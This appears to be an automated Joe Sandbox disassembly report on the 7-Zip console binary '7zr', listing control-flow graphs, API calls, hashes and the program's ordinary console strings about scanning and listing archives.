_CxxThrowException 77382->77447 77383 9f8c73 77449 9f1e40 free 77383->77449 77388 9f8ced 77427 9f31e5 malloc _CxxThrowException free _CxxThrowException 77388->77427 77389 9f2e04 2 API calls 77394 9f8ddf 77389->77394 77390 9f8c60 77423 9f31e5 malloc _CxxThrowException free _CxxThrowException 77390->77423 77392 9f8f11 77448 9f1e40 free 77392->77448 77397 9f8e0e 77394->77397 77398 9f8df1 77394->77398 77399 9f2f88 3 API calls 77397->77399 77432 9f3199 malloc _CxxThrowException free _CxxThrowException 77398->77432 77403 9f8e0c 77399->77403 77400 9f8d65 77400->77354 77400->77389 77401 9f8d08 77428 9f31e5 malloc _CxxThrowException free _CxxThrowException 77401->77428 77434 9f8f57 memmove 77403->77434 77405 9f8e03 77433 9f3199 malloc _CxxThrowException free _CxxThrowException 77405->77433 77408 9f8e22 77409 9f8e26 77408->77409 77410 9f8e3b 77408->77410 77435 9f3221 malloc _CxxThrowException free _CxxThrowException 77408->77435 77440 9f1e40 free 77409->77440 77436 9f8f34 malloc _CxxThrowException 77410->77436 77414 9f8e49 77437 9f31e5 malloc _CxxThrowException free _CxxThrowException 77414->77437 77416 9f8e56 77438 9f1e40 free 77416->77438 77418 9f8e62 77439 9f31e5 malloc _CxxThrowException free _CxxThrowException 77418->77439 77420->77334 77421->77374 77422->77390 77423->77378 77424->77383 77425->77376 77426->77388 77427->77401 77428->77381 77429->77383 77430->77352 77431->77400 77432->77405 77433->77403 77434->77408 77435->77410 77436->77414 77437->77416 77438->77418 77439->77409 77440->77354 77441->77334 77442->77360 77443->77373 77444->77334 77445->77375 77446->77382 77447->77392 77448->77383 77449->77334 77450->77326 77451->77322
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A381F1
                                      • Part of subcall function 00A3F749: _CxxThrowException.MSVCRT(?,00AA4A58), ref: 00A3F792
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: ExceptionH_prologThrow
                                    • String ID:
                                    • API String ID: 461045715-3916222277
                                    • Opcode ID: ec50288a6cc49e619038c1f7d702ba5d7383016e41edb54c1af8239d4fb653c7
                                    • Instruction ID: 661ec7fbe3d8ec5c984c787c26c40f0781f083dbe48772f1f98f037d8e774c44
                                    • Opcode Fuzzy Hash: ec50288a6cc49e619038c1f7d702ba5d7383016e41edb54c1af8239d4fb653c7
                                    • Instruction Fuzzy Hash: DB928E30900349DFDF15DFA8C984BAEBBB1BF58304F244099F815AB291CB79AE45CB61
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 009F686D
                                      • Part of subcall function 009F6848: FindClose.KERNELBASE(00000000,?,009F6880), ref: 009F6853
                                    • FindFirstFileW.KERNELBASE(?,-00000268,?,00000000), ref: 009F68A5
                                    • FindFirstFileW.KERNELBASE(?,-00000268,00000000,?,00000000), ref: 009F68DE
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: Find$FileFirst$CloseH_prolog
                                    • String ID:
                                    • API String ID: 3371352514-0
                                    • Opcode ID: eee7246b39d12b4f827cce8d8a708f75abdf5dae9c0d130a342fd73e449a0803
                                    • Instruction ID: 07115ca109a60763fc22bfa547d71ab2b5f9b11758b4b25940ccc952d9466b4c
                                    • Opcode Fuzzy Hash: eee7246b39d12b4f827cce8d8a708f75abdf5dae9c0d130a342fd73e449a0803
                                    • Instruction Fuzzy Hash: 0911903150020DEBCF10EFA4C855AFDB779EF50364F20462DEAA157192DB318E86DB40

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 a2a013-a2a01a 1 a2a020-a2a02d call a01ac8 0->1 2 a2a37a-a2a544 call a304d2 call 9f1524 call a304d2 call 9f1524 call 9f1e0c 0->2 7 a2a033-a2a03a 1->7 8 a2a22e-a2a235 1->8 62 a2a551 2->62 63 a2a546-a2a54f call a2b0fa 2->63 12 a2a054-a2a089 call a292d3 7->12 13 a2a03c-a2a042 7->13 10 a2a367-a2a375 call a2b55f 8->10 11 a2a23b-a2a24d call a2b4f6 8->11 28 a2ac23-a2ac2a 10->28 29 a2a259-a2a2fb call a17ebb call 9f27bb call 9f26dd call a13d70 call a2ad99 call 9f27bb 11->29 30 a2a24f-a2a253 11->30 26 a2a08b-a2a091 12->26 27 a2a099 12->27 13->12 15 a2a044-a2a04f call 9f30ea 13->15 15->12 26->27 33 a2a093-a2a097 26->33 34 a2a09d-a2a0de call 9f2fec call a2b369 27->34 35 a2ac3a-a2ac66 call a2b96d call 9f1e40 call a13247 28->35 36 a2ac2c-a2ac33 28->36 94 a2a303-a2a362 call a2b6ab call a22db9 call 9f1e40 * 2 call a2bff8 29->94 95 a2a2fd 29->95 30->29 33->34 58 a2a0e0-a2a0e4 34->58 59 a2a0ea-a2a0fa 34->59 68 a2ac68-a2ac6a 35->68 69 a2ac6e-a2acb5 call 9f1e40 call 9f11c2 call a2be0c call a22db9 35->69 36->35 40 a2ac35 36->40 45 a2ac35 call a2b988 40->45 45->35 58->59 64 a2a0fc-a2a102 59->64 65 a2a10d 59->65 72 a2a553-a2a55c 62->72 63->72 64->65 66 a2a104-a2a10b 64->66 67 a2a114-a2a19e call 9f2fec call a17ebb call a2ad99 65->67 66->67 102 a2a1a2 call a1f8e0 67->102 68->69 77 a2a564-a2a5c1 call 9f2fec call a2b277 72->77 78 a2a55e-a2a560 72->78 96 a2a5c3-a2a5c7 77->96 97 a2a5cd-a2a652 call a2ad06 call a2bf3e call a03a29 call 9f2e04 call a14345 77->97 78->77 94->28 95->94 96->97 136 a2a676-a2a6c8 call a12096 97->136 137 a2a654-a2a671 call a1375c call a2b96d 97->137 107 a2a1a7-a2a1b1 102->107 111 a2a1b3-a2a1bb call a2c7d7 107->111 112 a2a1c0-a2a1c9 107->112 111->112 117 a2a1d1-a2a229 call a2b6ab call a22db9 call 9f1e40 call a2bfa4 call a2940b 112->117 118 a2a1cb 112->118 117->28 118->117 143 a2a6cd-a2a6d6 136->143 137->136 146 a2a6e2-a2a6e5 143->146 147 a2a6d8-a2a6dd call a2c7d7 143->147 150 a2a6e7-a2a6ee 146->150 151 a2a72e-a2a73a 146->151 147->146 154 a2a722-a2a725 150->154 155 a2a6f0-a2a71d call 9f1fa0 fputs call 9f1fa0 call 9f1fb3 call 9f1fa0 150->155 152 a2a79e-a2a7aa 151->152 153 a2a73c-a2a74a call 9f1fa0 151->153 156 a2a7d9-a2a7e5 152->156 157 a2a7ac-a2a7b2 152->157 169 a2a755-a2a799 fputs call 9f2201 call 9f1fa0 fputs call 9f2201 call 9f1fa0 153->169 170 a2a74c-a2a753 153->170 154->151 158 a2a727 154->158 155->154 163 a2a7e7-a2a7ed 156->163 164 a2a818-a2a81a 156->164 157->156 161 a2a7b4-a2a7d4 fputs call 9f2201 call 9f1fa0 157->161 158->151 161->156 166 a2a899-a2a8a5 163->166 171 a2a7f3-a2a813 fputs call 9f2201 call 9f1fa0 163->171 164->166 167 a2a81c-a2a82b 164->167 179 a2a8a7-a2a8ad 166->179 180 a2a8e9-a2a8ed 166->180 174 a2a851-a2a85d 167->174 175 a2a82d-a2a84c fputs call 9f2201 call 9f1fa0 167->175 169->152 170->152 170->169 171->164 174->166 183 a2a85f-a2a872 call 9f1fa0 174->183 175->174 185 a2a8ef 179->185 189 a2a8af-a2a8c2 call 9f1fa0 179->189 184 a2a8f6-a2a8f8 180->184 180->185 183->166 209 a2a874-a2a894 fputs call 9f2201 call 9f1fa0 183->209 194 a2a8fe-a2a90a 184->194 195 a2aaaf-a2aaeb call a143b3 call 9f1e40 call a2c104 call a2ad82 184->195 185->184 189->185 207 a2a8c4-a2a8e4 fputs call 9f2201 call 9f1fa0 189->207 203 a2aa73-a2aa89 call 9f1fa0 194->203 204 a2a910-a2a91f 194->204 246 a2aaf1-a2aaf7 195->246 247 a2ac0b-a2ac1e call a22db9 * 2 195->247 203->195 220 a2aa8b-a2aaaa fputs call 9f2201 call 9f1fa0 203->220 204->203 211 a2a925-a2a929 204->211 207->180 209->166 211->195 217 a2a92f-a2a93d 211->217 223 a2a96a-a2a971 217->223 224 a2a93f-a2a964 fputs call 9f2201 call 9f1fa0 217->224 220->195 225 a2a973-a2a97a 223->225 226 a2a98f-a2a9a8 fputs call 9f2201 223->226 224->223 225->226 232 a2a97c-a2a982 225->232 240 a2a9ad-a2a9bd call 9f1fa0 226->240 232->226 238 a2a984-a2a98d 232->238 238->226 244 a2aa06-a2aa1f fputs call 9f2201 238->244 240->244 252 a2a9bf-a2aa01 fputs call 9f2201 call 9f1fa0 fputs call 9f2201 call 9f1fa0 240->252 251 a2aa24-a2aa29 call 9f1fa0 244->251 246->247 247->28 258 a2aa2e-a2aa4b fputs call 9f2201 251->258 252->244 262 a2aa50-a2aa5b call 9f1fa0 258->262 262->195 269 a2aa5d-a2aa71 call 9f1fa0 call a2710e 262->269 269->195
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$ExceptionThrow
                                    • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings: $N
                                    • API String ID: 3665150552-429544124
                                    • Opcode ID: 44379dc106533e3d72e4a438e44145cf88bee3f36d7c94b9c089ce0cc91614fc
                                    • Instruction ID: d4f1a5ddc9f4f24a1d69f5009dabf4f8d67fd0f85eb86d94b60332ef3af97ca4
                                    • Opcode Fuzzy Hash: 44379dc106533e3d72e4a438e44145cf88bee3f36d7c94b9c089ce0cc91614fc
                                    • Instruction Fuzzy Hash: B852AE30904269DFCF26DBA8DD85BEDBBB5BF94300F1441AAE149A7291DB316E84CF11

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 274 a2a42c-a2a433 275 a2a435-a2a444 fputs call 9f1fa0 274->275 276 a2a449-a2a4df call a2545d call 9f2e04 call a11858 call 9f1e40 274->276 275->276 286 a2a4e1-a2a4e9 call a2c7d7 276->286 287 a2a4ee-a2a4f1 276->287 286->287 289 a2a4f3-a2a4fa 287->289 290 a2a50e-a2a520 call a2c73e 287->290 289->290 291 a2a4fc-a2a509 call a257fb 289->291 295 a2a526-a2a544 call 9f1e0c 290->295 296 a2ac0b-a2ac2a call a22db9 * 2 290->296 291->290 304 a2a551 295->304 305 a2a546-a2a54f call a2b0fa 295->305 306 a2ac3a-a2ac66 call a2b96d call 9f1e40 call a13247 296->306 307 a2ac2c-a2ac33 296->307 309 a2a553-a2a55c 304->309 305->309 327 a2ac68-a2ac6a 306->327 328 a2ac6e-a2acb5 call 9f1e40 call 9f11c2 call a2be0c call a22db9 306->328 307->306 310 a2ac35 call a2b988 307->310 313 a2a564-a2a5c1 call 9f2fec call a2b277 309->313 314 a2a55e-a2a560 309->314 310->306 325 a2a5c3-a2a5c7 313->325 326 a2a5cd-a2a652 call a2ad06 call a2bf3e call a03a29 call 9f2e04 call a14345 313->326 314->313 325->326 348 a2a676-a2a6d6 call a12096 326->348 349 a2a654-a2a671 call a1375c call a2b96d 326->349 327->328 355 a2a6e2-a2a6e5 348->355 356 a2a6d8-a2a6dd call a2c7d7 348->356 349->348 358 a2a6e7-a2a6ee 355->358 359 a2a72e-a2a73a 355->359 356->355 362 a2a722-a2a725 358->362 363 a2a6f0-a2a71d call 9f1fa0 fputs call 9f1fa0 call 9f1fb3 call 9f1fa0 358->363 360 a2a79e-a2a7aa 359->360 361 a2a73c-a2a74a call 9f1fa0 359->361 364 a2a7d9-a2a7e5 360->364 365 a2a7ac-a2a7b2 360->365 377 a2a755-a2a799 fputs call 9f2201 call 9f1fa0 fputs call 9f2201 call 9f1fa0 361->377 378 a2a74c-a2a753 361->378 362->359 366 a2a727 362->366 363->362 371 a2a7e7-a2a7ed 364->371 372 a2a818-a2a81a 364->372 365->364 369 a2a7b4-a2a7d4 fputs call 9f2201 call 9f1fa0 365->369 366->359 369->364 374 a2a899-a2a8a5 371->374 379 a2a7f3-a2a813 fputs call 9f2201 call 9f1fa0 371->379 372->374 375 a2a81c-a2a82b 372->375 387 a2a8a7-a2a8ad 374->387 388 a2a8e9-a2a8ed 374->388 382 a2a851-a2a85d 375->382 383 a2a82d-a2a84c fputs call 9f2201 call 9f1fa0 375->383 377->360 378->360 378->377 379->372 382->374 391 a2a85f-a2a872 call 9f1fa0 382->391 383->382 393 a2a8ef 387->393 397 a2a8af-a2a8c2 call 9f1fa0 387->397 392 a2a8f6-a2a8f8 388->392 388->393 391->374 417 a2a874-a2a894 fputs call 9f2201 call 9f1fa0 391->417 402 a2a8fe-a2a90a 392->402 403 a2aaaf-a2aaeb call a143b3 call 9f1e40 call a2c104 call a2ad82 392->403 393->392 397->393 415 a2a8c4-a2a8e4 fputs call 9f2201 call 9f1fa0 397->415 411 a2aa73-a2aa89 call 9f1fa0 402->411 412 a2a910-a2a91f 402->412 403->296 454 a2aaf1-a2aaf7 403->454 411->403 428 a2aa8b-a2aaaa fputs call 9f2201 call 9f1fa0 411->428 412->411 419 a2a925-a2a929 412->419 415->388 417->374 419->403 425 a2a92f-a2a93d 419->425 431 a2a96a-a2a971 425->431 432 a2a93f-a2a964 fputs call 9f2201 call 9f1fa0 425->432 428->403 433 a2a973-a2a97a 431->433 434 a2a98f-a2a9a8 fputs call 9f2201 431->434 432->431 433->434 440 a2a97c-a2a982 433->440 448 a2a9ad-a2a9bd call 9f1fa0 434->448 440->434 446 a2a984-a2a98d 440->446 446->434 452 a2aa06-a2aa4b fputs call 9f2201 call 9f1fa0 fputs call 9f2201 446->452 448->452 458 a2a9bf-a2aa01 fputs call 9f2201 call 9f1fa0 fputs call 9f2201 call 9f1fa0 448->458 466 a2aa50-a2aa5b call 9f1fa0 452->466 454->296 458->452 466->403 473 a2aa5d-a2aa71 call 9f1fa0 call a2710e 466->473 473->403
                                    APIs
                                    • fputs.MSVCRT(Scanning the drive for archives:), ref: 00A2A43E
                                      • Part of subcall function 009F1FA0: fputc.MSVCRT ref: 009F1FA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputcfputs
                                    • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings: $!"$N
                                    • API String ID: 269475090-3104439828
                                    • Opcode ID: b75e1da835a34d35fbca7d1dee58ab952dcfa21faaf6c444c3b23f12841e077d
                                    • Instruction ID: 2254b7a326e7e6b3ab89b0b08721446a4c1f0f02ab5e2ab6a38164c3f0ff7418
                                    • Opcode Fuzzy Hash: b75e1da835a34d35fbca7d1dee58ab952dcfa21faaf6c444c3b23f12841e077d
                                    • Instruction Fuzzy Hash: 4C228E31900268DFDF2AEBA8D945BEDFBB1BF94300F1440AAE55963291DB716E84CF11

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 777 a28012-a28032 call a8fb10 780 a28285 777->780 781 a28038-a2806c fputs call a28341 777->781 782 a28287-a28295 780->782 785 a280c8-a280cd 781->785 786 a2806e-a28071 781->786 787 a280d6-a280df 785->787 788 a280cf-a280d4 785->788 789 a28073-a28089 fputs call 9f1fa0 786->789 790 a2808b-a2808d 786->790 791 a280e2-a28110 call a28341 call a28622 787->791 788->791 789->785 793 a28096-a2809f 790->793 794 a2808f-a28094 790->794 805 a28112-a28119 call a2831f 791->805 806 a2811e-a2812f call a28565 791->806 797 a280a2-a280c7 call 9f2e47 call a285c6 call 9f1e40 793->797 794->797 797->785 805->806 806->782 812 a28135-a2813f 806->812 813 a28141-a28148 call a282bb 812->813 814 a2814d-a2815b 812->814 813->814 814->782 817 a28161-a28164 814->817 818 a281b6-a281c0 817->818 819 a28166-a28186 817->819 820 a28276-a2827f 818->820 821 a281c6-a281e1 fputs 818->821 824 a28298-a2829d 819->824 825 a2818c-a28196 call a28565 819->825 820->780 820->781 821->820 826 a281e7-a281fb 821->826 827 a282b1-a282b9 SysFreeString 824->827 831 a2819b-a2819d 825->831 829 a28273 826->829 830 a281fd-a2821f 826->830 827->782 829->820 834 a28221-a28245 830->834 835 a2829f-a282a1 830->835 831->824 832 a281a3-a281b4 SysFreeString 831->832 832->818 832->819 838 a282a3-a282ab call 9f965d 834->838 839 a28247-a28271 call a284a7 call 9f965d SysFreeString 834->839 836 a282ae 835->836 836->827 838->836 839->829 839->830
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A28017
                                    • fputs.MSVCRT ref: 00A2804D
                                      • Part of subcall function 00A28341: __EH_prolog.LIBCMT ref: 00A28346
                                      • Part of subcall function 00A28341: fputs.MSVCRT ref: 00A2835B
                                      • Part of subcall function 00A28341: fputs.MSVCRT ref: 00A28364
                                    • fputs.MSVCRT ref: 00A2807A
                                      • Part of subcall function 009F1FA0: fputc.MSVCRT ref: 009F1FA7
                                      • Part of subcall function 009F965D: VariantClear.OLEAUT32(?), ref: 009F967F
                                    • SysFreeString.OLEAUT32(00000000), ref: 00A281AA
                                    • fputs.MSVCRT ref: 00A281CD
                                    • SysFreeString.OLEAUT32(00000000), ref: 00A28267
                                    • SysFreeString.OLEAUT32(00000000), ref: 00A282B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$FreeString$H_prolog$ClearVariantfputc
                                    • String ID: --$----$Path$Type$Warning: The archive is open with offset
                                    • API String ID: 2889736305-3797937567
                                    • Opcode ID: ff1dfec3422057e7f13822911e03c3702503cac7ac2beaff7df6804430ec58b0
                                    • Instruction ID: bdeba71307ec44b5c060f86d9bb8717ff7aff52671a76834eb7ca20f266bd100
                                    • Opcode Fuzzy Hash: ff1dfec3422057e7f13822911e03c3702503cac7ac2beaff7df6804430ec58b0
                                    • Instruction Fuzzy Hash: 61914831A01625EFDF18DFA8E985AEEB7B5FF48310F204129F512E7291DB74A905CB60

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 846 a26766-a26792 call a8fb10 EnterCriticalSection 849 a26794-a26799 call a2c7d7 846->849 850 a267af-a267b7 846->850 854 a2679e-a267ac 849->854 852 a267b9 call 9f1f91 850->852 853 a267be-a267c3 850->853 852->853 856 a26892-a268a8 853->856 857 a267c9-a267d5 853->857 854->850 860 a26941 856->860 861 a268ae-a268b4 856->861 858 a26817-a2682f 857->858 859 a267d7-a267dd 857->859 864 a26873-a2687b 858->864 865 a26831-a26842 call 9f1fa0 858->865 859->858 862 a267df-a267eb 859->862 866 a26943-a2695a 860->866 861->860 863 a268ba-a268c2 861->863 869 a267f3-a26801 862->869 870 a267ed 862->870 867 a26933-a2693f call a2c5cd 863->867 871 a268c4-a268e6 call 9f1fa0 fputs 863->871 864->867 868 a26881-a26887 864->868 865->864 879 a26844-a2686c fputs call 9f2201 865->879 867->866 868->867 874 a2688d 868->874 869->864 876 a26803-a26815 fputs 869->876 870->869 887 a268fb-a26917 call a04f2a call 9f1fb3 call 9f1e40 871->887 888 a268e8-a268f9 fputs 871->888 880 a2692e call 9f1f91 874->880 882 a2686e call 9f1fa0 876->882 879->882 880->867 882->864 891 a2691c-a26928 call 9f1fa0 887->891 888->891 891->880
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A2676B
                                    • EnterCriticalSection.KERNEL32(00AB2938), ref: 00A26781
                                    • fputs.MSVCRT ref: 00A2680B
                                    • LeaveCriticalSection.KERNEL32(00AB2938), ref: 00A26944
                                      • Part of subcall function 00A2C7D7: fputs.MSVCRT ref: 00A2C840
                                    • fputs.MSVCRT ref: 00A26851
                                      • Part of subcall function 009F2201: fputs.MSVCRT ref: 009F221E
                                    • fputs.MSVCRT ref: 00A268D9
                                    • fputs.MSVCRT ref: 00A268F6
                                      • Part of subcall function 009F1FA0: fputc.MSVCRT ref: 009F1FA7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$CriticalSection$EnterH_prologLeavefputc
                                    • String ID: v$Sub items Errors:
                                    • API String ID: 2670240366-2468115448
                                    • Opcode ID: 27d9983d824dd76cd51c608d19c0b8be2d4077dadf0cfed8bdc2f62410857fad
                                    • Instruction ID: c0039546815c4892360beb1ad58bb0e3536c147e44e9daeaead16832c4f820cb
                                    • Opcode Fuzzy Hash: 27d9983d824dd76cd51c608d19c0b8be2d4077dadf0cfed8bdc2f62410857fad
                                    • Instruction Fuzzy Hash: 6C519031602600CFCB25DF68E994BE9B7E2FF84320F54443EE19A87261CB316C85CB94

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 898 a26359-a26373 call a8fb10 901 a26375-a26385 call a2c7d7 898->901 902 a2639e-a263af call a25a4d 898->902 901->902 907 a26387-a2639b 901->907 908 a263b5-a263cd 902->908 909 a265ee-a265f1 902->909 907->902 910 a263d2-a263d4 908->910 911 a263cf 908->911 912 a265f3-a265fb 909->912 913 a26624-a2663c 909->913 918 a263d6-a263d9 910->918 919 a263df-a263e7 910->919 911->910 914 a26601-a26607 call a28012 912->914 915 a266ea call a2c5cd 912->915 916 a26643-a2664b 913->916 917 a2663e call 9f1f91 913->917 928 a2660c-a2660e 914->928 927 a266ef-a266fd 915->927 916->915 923 a26651-a2668f fputs call 9f211a call 9f1fa0 call a28685 916->923 917->916 918->919 922 a264b1-a264bc call a26700 918->922 924 a26411-a26413 919->924 925 a263e9-a263f2 call 9f1fa0 919->925 945 a264c7-a264cf 922->945 946 a264be-a264c1 922->946 923->927 980 a26691-a26697 923->980 929 a26442-a26446 924->929 930 a26415-a2641d 924->930 925->924 950 a263f4-a2640c call 9f210c call 9f1fa0 925->950 928->927 934 a26614-a2661f call 9f1fa0 928->934 938 a26497-a2649f 929->938 939 a26448-a26450 929->939 935 a2642a-a2643b 930->935 936 a2641f-a26425 call a26134 930->936 934->915 935->929 936->935 938->922 942 a264a1-a264ac call 9f1fa0 call 9f1f91 938->942 947 a26452-a2647a fputs call 9f1fa0 call 9f1fb3 call 9f1fa0 939->947 948 a2647f-a26490 939->948 942->922 954 a264d1-a264da call 9f1fa0 945->954 955 a264f9-a264fb 945->955 946->945 953 a265a2-a265a6 946->953 947->948 948->938 950->924 962 a265da-a265e6 953->962 963 a265a8-a265b6 953->963 954->955 985 a264dc-a264f4 call 9f210c call 9f1fa0 954->985 959 a2652a-a2652e 955->959 960 a264fd-a26505 955->960 973 a26530-a26538 959->973 974 a2657f-a26587 959->974 970 a26512-a26523 960->970 971 a26507-a2650d call a26134 960->971 962->908 979 a265ec 962->979 975 a265d3 963->975 976 a265b8-a265ca call a26244 963->976 970->959 971->970 982 a26567-a26578 973->982 983 a2653a-a26562 fputs call 9f1fa0 call 9f1fb3 call 9f1fa0 973->983 974->953 987 a26589-a26595 call 9f1fa0 974->987 975->962 976->975 999 a265cc-a265ce call 9f1f91 976->999 979->909 989 a26699-a2669f 980->989 990 a266df-a266e5 call 9f1f91 980->990 982->974 983->982 985->955 987->953 1002 a26597-a2659d call 9f1f91 987->1002 996 a266b3-a266ce call a04f2a call 9f1fb3 call 9f1e40 989->996 997 a266a1-a266b1 fputs 989->997 990->915 1003 a266d3-a266da call 9f1fa0 996->1003 997->1003 999->975 1002->953 1003->990
                                    APIs
                                    • __EH_prolog.LIBCMT ref: 00A2635E
                                    • fputs.MSVCRT ref: 00A2645F
                                      • Part of subcall function 00A2C7D7: fputs.MSVCRT ref: 00A2C840
                                    • fputs.MSVCRT ref: 00A26547
                                    • fputs.MSVCRT ref: 00A2665F
                                    • fputs.MSVCRT ref: 00A266AE
                                      • Part of subcall function 009F1F91: fflush.MSVCRT ref: 009F1F93
                                      • Part of subcall function 009F1FB3: __EH_prolog.LIBCMT ref: 009F1FB8
                                      • Part of subcall function 009F1E40: free.MSVCRT ref: 009F1E44
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000A.00000002.1824710209.00000000009F1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 009F0000, based on PE: true
                                    • Associated: 0000000A.00000002.1824545341.00000000009F0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824768129.0000000000A9C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824789952.0000000000AB2000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000000A.00000002.1824807798.0000000000ABB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_10_2_9f0000_7zr.jbxd
                                    Similarity
                                    • API ID: fputs$H_prolog$fflushfree
                                    • String ID: Can't allocate required memory$ERRORS:$WARNINGS:
                                    • API String ID: 1750297421-1898165966
                                    • Opcode ID: d9788fce49110ec4dc960e1ffc8a0ca4cb7a8040bc6fef45919704c7781150ed
                                    • Instruction ID: ba2ebfa1437413bf1e5f1fa9e58774d59ac607f887fada6ae7d4a1a8632dc2b3
                                    • Opcode Fuzzy Hash: d9788fce49110ec4dc960e1ffc8a0ca4cb7a8040bc6fef45919704c7781150ed
                                    • Instruction Fuzzy Hash: 1CB16D30602715CFDB28EF68E9A1BAAB7E1FF44314F04453DE69A57292CB71AD44CB90

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
